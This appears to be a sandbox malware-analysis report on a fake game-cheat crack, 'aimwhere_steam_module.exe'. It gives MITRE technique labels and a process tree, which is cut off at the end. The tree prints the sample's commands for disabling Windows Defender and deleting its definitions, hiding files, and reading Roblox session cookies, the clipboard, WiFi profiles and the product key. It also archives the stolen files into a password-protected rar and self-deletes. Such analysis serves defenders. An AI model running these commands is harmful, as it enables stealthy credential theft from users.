PID 3084 wrote to memory of 808	3084	cmd.exe	126
PID 3084 wrote to memory of 808	3084	cmd.exe	126
PID 3708 wrote to memory of 4556	3708	cmd.exe	182
PID 3708 wrote to memory of 4556	3708	cmd.exe	182
PID 3092 wrote to memory of 2460	3092	aimwhere_steam_module.exe	128
PID 3092 wrote to memory of 2460	3092	aimwhere_steam_module.exe	128
PID 3092 wrote to memory of 4520	3092	aimwhere_steam_module.exe	129
PID 3092 wrote to memory of 4520	3092	aimwhere_steam_module.exe	129
PID 2460 wrote to memory of 2364	2460	cmd.exe	132
PID 2460 wrote to memory of 2364	2460	cmd.exe	132
PID 4520 wrote to memory of 4268	4520	cmd.exe	133
PID 4520 wrote to memory of 4268	4520	cmd.exe	133
PID 3092 wrote to memory of 4608	3092	aimwhere_steam_module.exe	190
PID 3092 wrote to memory of 4608	3092	aimwhere_steam_module.exe	190
PID 3092 wrote to memory of 4660	3092	aimwhere_steam_module.exe	135
PID 3092 wrote to memory of 4660	3092	aimwhere_steam_module.exe	135
PID 3092 wrote to memory of 1616	3092	aimwhere_steam_module.exe	201
PID 3092 wrote to memory of 1616	3092	aimwhere_steam_module.exe	201

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 14 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1808	attrib.exe
5128	attrib.exe
2704	attrib.exe
1448	attrib.exe
4188	attrib.exe
1796	attrib.exe
808	attrib.exe
3144	attrib.exe
960	attrib.exe
2128	attrib.exe
1804	attrib.exe
4824	attrib.exe
4808	attrib.exe
2032	attrib.exe

C:\Users\Admin\AppData\Local\Temp\aimwhere_crack\aimwhere_steam_module.exe
"C:\Users\Admin\AppData\Local\Temp\aimwhere_crack\aimwhere_steam_module.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:756
- C:\Users\Admin\AppData\Local\Temp\aimwhere_crack\aimwhere_steam_module.exe
  "C:\Users\Admin\AppData\Local\Temp\aimwhere_crack\aimwhere_steam_module.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\aimwhere_crack\aimwhere_steam_module.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1844
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\aimwhere_crack\aimwhere_steam_module.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2380
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:704
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4736
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      PID:4788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3624
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3536
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1068
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:4812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2372
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:5032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3608
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:2868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1720
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\aimwhere_crack\aimwhere_steam_module.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3084
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\aimwhere_crack\aimwhere_steam_module.exe"
      4⤵
      Views/modifies file attributes
      PID:808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍ ‍ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3708
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍ ‍ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2460
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4520
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:4608
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:2660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    PID:4660
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:2176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1616
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:5080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4964
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    PID:1444
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      PID:4844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:5116
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:3592
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:1436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4880
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:2468
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:2704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4664
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:3988
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:1804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4292
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3696
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4088
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4164
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4348
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      PID:4992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4556
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2536
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      PID:4920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:3340
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:4608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI7562\rar.exe a -r -hp"123456" "C:\Users\Admin\AppData\Local\Temp\iWM3w.zip" *"
    3⤵
    PID:4720
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4880
  - - C:\Users\Admin\AppData\Local\Temp\_MEI7562\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI7562\rar.exe a -r -hp"123456" "C:\Users\Admin\AppData\Local\Temp\iWM3w.zip" *
      4⤵
      Executes dropped EXE
      PID:1932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:4400
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:3960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:2700
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:1616
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:4272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:4708
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      PID:3696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:644
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:1144
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      PID:4576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\aimwhere_crack\aimwhere_steam_module.exe""
    3⤵
    PID:3428
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      Runs ping.exe
      PID:4948

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:912

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1560

C:\Users\Admin\Desktop\bound.exe
"C:\Users\Admin\Desktop\bound.exe"
1⤵
- Executes dropped EXE
- Modifies registry class
PID:2020

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:4184

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:4340
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - NTFS ADS
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:2236
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2236.0.1560878842\2090896727" -parentBuildID 20230214051806 -prefsHandle 1740 -prefMapHandle 1732 -prefsLen 22076 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a983f143-b754-4edf-8508-408af3138177} 2236 "\\.\pipe\gecko-crash-server-pipe.2236" 1832 2877fd13958 gpu
    3⤵
    PID:1260
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2236.1.1457202559\305225736" -parentBuildID 20230214051806 -prefsHandle 2356 -prefMapHandle 2352 -prefsLen 22112 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7cfe42bc-e8cc-4d39-aadc-648d10ebcad5} 2236 "\\.\pipe\gecko-crash-server-pipe.2236" 2400 28703487c58 socket
    3⤵
    - Checks processor information in registry
    PID:2804
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2236.2.1580341665\885409019" -childID 1 -isForBrowser -prefsHandle 2824 -prefMapHandle 2840 -prefsLen 22150 -prefMapSize 235121 -jsInitHandle 976 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {36bb67d1-28d5-4b86-98df-bc041d1ae22e} 2236 "\\.\pipe\gecko-crash-server-pipe.2236" 2820 28705f12258 tab
    3⤵
    PID:1828
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2236.3.907084713\112951162" -childID 2 -isForBrowser -prefsHandle 3684 -prefMapHandle 3680 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 976 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8e0f4d64-ab5c-4d72-844b-99ddada52c6b} 2236 "\\.\pipe\gecko-crash-server-pipe.2236" 3688 28707b89858 tab
    3⤵
    PID:3832
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2236.4.1396934537\1788578458" -childID 3 -isForBrowser -prefsHandle 4932 -prefMapHandle 4920 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 976 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {acc9eba9-0647-481e-b718-db61b07e2b43} 2236 "\\.\pipe\gecko-crash-server-pipe.2236" 4944 28709b70b58 tab
    3⤵
    PID:4884
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2236.5.1475605409\1076420183" -childID 4 -isForBrowser -prefsHandle 5092 -prefMapHandle 5096 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 976 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {18af37e3-aa91-4cf5-8e09-8eac0074dbe4} 2236 "\\.\pipe\gecko-crash-server-pipe.2236" 5088 28709b6f958 tab
    3⤵
    PID:2860
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2236.6.734482133\676250436" -childID 5 -isForBrowser -prefsHandle 5276 -prefMapHandle 5280 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 976 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dc9cbb7c-4675-4198-a99c-09c98226eaed} 2236 "\\.\pipe\gecko-crash-server-pipe.2236" 5260 28709b6e458 tab
    3⤵
    PID:1252
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2236.7.12022874\776766636" -childID 6 -isForBrowser -prefsHandle 5976 -prefMapHandle 5960 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 976 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4d8688e5-df06-4e0d-8c2c-5e992fbc0ed5} 2236 "\\.\pipe\gecko-crash-server-pipe.2236" 5936 2870aa32c58 tab
    3⤵
    PID:3424

C:\Users\Admin\AppData\Local\Temp\Temp1_aimwhere_crack.zip\aimwhere_crack\aimwhere_steam_module.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_aimwhere_crack.zip\aimwhere_crack\aimwhere_steam_module.exe"
1⤵
PID:4724
- C:\Users\Admin\AppData\Local\Temp\Temp1_aimwhere_crack.zip\aimwhere_crack\aimwhere_steam_module.exe
  "C:\Users\Admin\AppData\Local\Temp\Temp1_aimwhere_crack.zip\aimwhere_crack\aimwhere_steam_module.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  PID:4480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Temp1_aimwhere_crack.zip\aimwhere_crack\aimwhere_steam_module.exe'"
    3⤵
    PID:3592
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Temp1_aimwhere_crack.zip\aimwhere_crack\aimwhere_steam_module.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    PID:4712
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      PID:4664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    PID:5020
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    PID:840
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Modifies registry class
      PID:2340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4200
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:1272
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:5024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    PID:2068
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:2824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    PID:3564
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:4324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:3864
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:2300
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Temp1_aimwhere_crack.zip\aimwhere_crack\aimwhere_steam_module.exe""
    3⤵
    PID:4120
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Temp1_aimwhere_crack.zip\aimwhere_crack\aimwhere_steam_module.exe"
      4⤵
      Views/modifies file attributes
      PID:2032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‎ .scr'"
    3⤵
    PID:1944
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‎ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:2872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:5108
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1768
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:2136
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:3204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    PID:4220
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3800
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2068
  - - C:\Windows\system32\tree.com
